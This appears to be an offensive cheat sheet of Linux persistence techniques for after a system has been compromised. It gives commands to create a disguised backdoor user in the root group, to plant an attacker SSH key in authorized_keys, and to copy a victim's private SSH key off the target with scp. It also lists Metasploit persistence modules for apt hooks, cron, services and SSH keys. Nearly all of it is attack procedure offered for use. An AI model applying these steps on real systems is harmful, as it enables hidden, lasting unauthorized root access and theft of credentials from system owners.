Create a backdoor user:

This creates a user:

useradd -m <username> -s <bash_shell>                        #E.g. useradd -m ftp -s /bin/bash

This changes the password of a user:

passwd <username>                                            #E.g.  passwd Super_secret_Password

To add this user to the root group(To inherit root permisions):

usermod -aG <group_to_join> <new_user_to_group>              #E.g.  usermod -aG root ftp

Change the user id of the user(To make it less sus):

usermod -u <user_id> <username>                              #E.g.  usermod -u 15 ftp

Change the Group id of the user:

usermod -g <group_id> <username>                             #E.g.  usermod -g 15 ftp

Persistence via SSH Keys:

1. Create a key pair and transfer the public key to the Target:

⚠️ Assumes attacker already has access to the target system (via SSH, reverse shell, etc.)

1. Create SSH Key Pair on Attacker Machine

ssh-keygen -t rsa -b 4096 -f ~/.ssh/evil_key

  • -t rsa: key type

  • -b 4096: 4096-bit key

  • -f ~/.ssh/evil_key: save private key to specified file

This produces two files:

  • evil_key (private key)

  • evil_key.pub (public key)

Append the public key to the target somehow to the /.ssh/authorized_keys and now you should be able to login with your private key.....

2. Transfer the private key from target to our machine:

whenever we generate a ssh key it creates 2 keys in the home directory of the user under /.ssh: id_rsa which is the private key. id_rsa.pub is the public key.

If we have a ssh connection we can copy the id_rsa key to our host machine by this command: We used the colon to specify what file we want to download from that user directory:

scp <user>@<ip>~/.ssh/id_rsa .

Then give this key normal permissions: chmod 400 id_rsa

Then we can ssh login without a password:

ssh -i id_rsa <user>@<ip>

Persistence MSF Modules:

search platform:linux persistence

Module Description
exploit/linux/local/apt_package_manager_persistence This module will run a payload when the package manager is used. No
handler is ran automatically so you must configure an appropriate
exploit/multi/handler to connect. This module creates a pre-invoke hook
for APT in apt.conf.d. The hook name syntax is numeric followed by text.
exploit/linux/local/cron_persistence This module will create a cron or crontab entry to execute a payload.
The module includes the ability to automatically clean up those entries to prevent multiple executions.
syslog will get a copy of the cron entry.
exploit/linux/local/service_persistence This module will create a service on the box, and mark it for auto-restart.
We need enough access to write service files and potentially restart services
post/linux/manage/sshkey_persistence # BEST METHOD This module will add an SSH key to a specified user (or all), to allow
remote login via SSH at any time.

set CREATESSHFOLDER true
set SESSION <session_id>
Then create a file and add the sshkey to it with limited permissions:
chmod 400 ssh_key

Then Login with SSH:
ssh -i ssh_key root@<ip>